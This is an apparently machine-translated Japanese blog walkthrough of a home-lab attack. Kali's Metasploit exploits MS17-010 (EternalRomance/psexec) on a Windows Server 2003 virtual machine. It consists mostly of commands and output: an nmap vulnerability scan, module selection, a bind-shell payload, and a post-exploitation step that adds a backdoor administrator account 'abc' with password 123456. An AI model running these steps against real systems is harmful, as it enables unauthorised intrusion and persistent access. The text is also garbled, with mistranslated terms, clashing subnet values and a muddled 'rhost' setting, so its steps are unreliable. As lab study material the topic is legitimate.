KaliのMetasploit-フレームワークは脆弱性を悪用してWindows2003Serverに侵入します
Kalis Metasploit Framework Exploits Vulnerability Invade Windows2003server
塔の前のセクションによると: https://blog.csdn.net/qq_41709494/article/details/89278964
#VMwareTowerを使用してWindows2003Serverターゲットを構築します。IPアドレスは192.168.137.128です。
#また、情報の一部はスクリーンショットなしで省略されています
#-onlyモード(ホストのみ)ネットワークWindows2003Serverはインターネットにアクセスできます
#他のネットワークユーザーがこの計算されたインターネット接続を介して接続できるようにチェックし、ネットワークカードVMwareネットワークアダプターVMnet1を選択します。次の図は、LANアダプターがIPアドレス192.168.137.1を使用するように設定されていることを示しています。
#注:ネットワーク番号はIP192.168.137.0に設定する必要があります。ネットワークカードを選択して、VMwareのホストオンリーモードのネットワークカードかどうかを確認してください。
#サブネットIPを192.168.37.0に設定し、上の図に従ってDHCPを開始します。
#ping Baiduは成功しました、あなたはオンラインに行くことができます
塔の前のセクションによると: https://blog.csdn.net/qq_41709494/article/details/89278964
#KaliはVirtualBoxで構築され、ホストオンリーネットワークのみのIPでXshellに接続されています。KaliのホストのみのIPは192.168.30.3です。
#Xshellに接続して、KaliのIPアドレスを表示します
#脆弱性のnmapスキャン
root@xxxxx:~# nmap --script=vuln 192.168.137.128 # Parameters--script=vuln IP Scan for this IP vulnerability Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-16 22:23 CST Nmap scan report for 192.168.137.128 Host is up (1.0s latency). Not shown: 993 closed ports PORT STATE SERVICE 21/tcp open ftp |_sslv2-drown: 80/tcp open http |_http-csrf: Couldn't find any CSRF vulnerabilities. |_http-dombased-xss: Couldn't find any DOM based XSS. |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 1025/tcp open NFS-or-IIS 1026/tcp open LSA-or-nterm Host script results: | smb-vuln-ms08-067: | VULNERABLE: | Microsoft Windows system vulnerable to remote code execution (MS08-067) | State: VULNERABLE | IDs: CVE:CVE-2008-4250 | The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, | Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary | code via a crafted RPC request that triggers the overflow during path canonicalization. | | Disclosure date: 2008-10-23 | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250 |_ https://technet.microsoft.com/en-us/library/security/ms08-067.aspx |_smb-vuln-ms10-054: false |_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND | smb-vuln-ms17-010: | VULNERABLE: | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) | State: VULNERABLE | IDs: CVE:CVE-2017-0143 | Risk factor: HIGH | A critical remote code execution vulnerability exists in Microsoft SMBv1 | servers (ms17-010). | | Disclosure date: 2017-03-14 | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx |_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/ |_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug) Nmap done: 1 IP address (1 host up) scanned in 150.48 seconds #ms17-010の脆弱性
#metasploit-フレームワーク
#脆弱性モジュールの検索
msf5 > search ms17-010 Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 1 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution 2 auxiliary/scanner/smb/smb_ms17_010 normal Yes MS17-010 SMB RCE Detection 3 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption 4 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+ 5 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution #
msf5 > use exploit/windows/smb/ms17_010_psexec msf5 exploit(windows/smb/ms17_010_psexec) > #モジュール情報を表示
msf5 exploit(windows/smb/ms17_010_psexec) > info Name: MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution Module: exploit/windows/smb/ms17_010_psexec Platform: Windows Arch: x86, x64 Privileged: No License: Metasploit Framework License (BSD) Rank: Normal Disclosed: 2017-03-14 Provided by: sleepya zerosum0x0 Shadow Brokers Equation Group Available targets: Id Name -- ---- 0 Automatic 1 PowerShell 2 Native upload 3 MOF upload Check supported: No Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- DBGTRACE false yes Show extra debug trace info LEAKATTEMPTS 99 yes How many times to try to leak transaction NAMEDPIPE no A named pipe that can be connected to (leave blank for auto) NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check RHOSTS yes The target address range or CIDR identifier RPORT 445 yes The Target port SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing SERVICE_DISPLAY_NAME no The service display name SERVICE_NAME no The service name SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share SMBDomain . no The Windows domain to use for authentication SMBPass no The password for the specified username SMBUser no The username to authenticate as Payload information: Space: 3072 Description: This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where primitive. This will then be used to overwrite the connection session information with as an Administrator session. From there, the normal psexec payload code execution is done. Exploits a type confusion between Transaction and WriteAndX requests and a race condition in Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a named pipe. References: https://technet.microsoft.com/en-us/library/security/MS17-010 https://cvedetails.com/cve/CVE-2017-0143/ https://cvedetails.com/cve/CVE-2017-0146/ https://cvedetails.com/cve/CVE-2017-0147/ https://github.com/worawit/MS17-010 https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/ AKA: ETERNALSYNERGY ETERNALROMANCE ETERNALCHAMPION ETERNALBLUE #Viewモジュールパラメータの選択
msf5 exploit(windows/smb/ms17_010_psexec) > show options Module options (exploit/windows/smb/ms17_010_psexec): Name Current Setting Required Description ---- --------------- -------- ----------- DBGTRACE false yes Show extra debug trace info LEAKATTEMPTS 99 yes How many times to try to leak transaction NAMEDPIPE no A named pipe that can be connected to (leave blank for auto) NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check RHOSTS yes The target address range or CIDR identifier RPORT 445 yes The Target port SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing SERVICE_DISPLAY_NAME no The service display name SERVICE_NAME no The service name SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share SMBDomain . no The Windows domain to use for authentication SMBPass no The password for the specified username SMBUser no The username to authenticate as Exploit target: Id Name -- ---- 0 Automatic #ペイロードはリモートホストで動的コードを実行し、ターゲットマシンがシェルを放棄するようにします
msf5 exploit(windows/smb/ms17_010_psexec) > set payload windows/shell_bind_tcp payload => windows/shell_bind_tcp #攻撃対象のIPを設定する
msf5 exploit(windows/smb/ms17_010_psexec) > set rhosts 192.168.137.128 rhosts => 192.168.137.128 #アンチ接続のホストIPを設定します
msf5 exploit(windows/smb/ms17_010_psexec) > set rhost 192.168.30.3 rhost => 192.168.30.3 #
msf5 exploit(windows/smb/ms17_010_psexec) > exploit #Windows2003Server
#Xshellツールが文字化けしています。gbk形式を使用してください。
#implement抽出権限
#abcユーザーを作成します。パスワードは123456です。
C:WINDOWSsystem32>net user abc 123456 /add net user abc 123456 /add The command completed successfully. #管理グループを追加
C:WINDOWSsystem32>net localgroup administrators abc /add net localgroup administrators abc /add The command completed successfully. #View user abc
#